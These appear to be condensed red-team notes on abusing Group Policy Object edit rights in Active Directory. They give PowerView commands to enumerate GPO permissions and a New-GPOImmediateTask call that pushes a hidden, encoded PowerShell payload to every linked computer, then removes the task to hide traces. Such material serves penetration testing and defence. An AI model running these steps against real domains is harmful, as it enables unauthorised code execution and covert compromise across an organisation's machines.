- Group Policy Objects are Active Directory containers used to store groupings of policy settings. These objects are then linked to specific sites, domains, or most commonly specific organizational units (OUs).
- By default, computer Group Policy is updated in the background every 90 minutes, with a random offset of 0 to 30 minutes.
-
PowerView, theGet-NetGPOcmdlet allows for the easy enumeration of all current GPOs in a given domain.
Get-NetGPO -ComputerName WINDOWS1.testlab.local
- The gpcfilesyspath field shows you where the configuration for the policy resides.
- Let’s enumerate all the permissions for all GPOs in the current domain:
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
NOTE: you can also use PowerView’s Invoke-ACLScanner to speed up your search. This will search the ACLs for ALL domain objects, and returns results where the IdentityReference RID is -1000 or above and also has some times of modification rights on the given object.
- Here’s what a misconfiguration might look like:
- And here’s how that misconfiguration looks through the Group Policy Management console:
- So the
TESTLAB\willuser has modification rights on the GPO with the GUID of{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}and display name ofSecurePolicy. Let’s track this back and see what systems this GPO is applied to:
Get-NetOU -GUID "{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}" | %{Get-NetComputer -ADSpath $_}
- with edit rights to the GPO, we can force code execution on these machines!
-
My preference for immediate code execution would be to push out an ‘Immediate’ Scheduled task, which instantly runs and then removes itself, every time group policy refreshes. \
-
need to build a schtask .XML template to substitute in our appropriate configuration/commands and then copy it to <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml of the GPO we can edit.
-
After waiting 1-2 hours for the group policy refresh cycle, we can remove the .xml to minimize our footprint.
-
PowerView’s new New-GPOImmediateTask function should take care of all this for you. The -TaskName argument is required, -Command specified the command to run (which defaults to powershell.exe), and -CommandArguments specifies the arguments for the given binary.
New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -W Hidden -Enc JABXAGMAPQBO...' -Force
New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy
https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/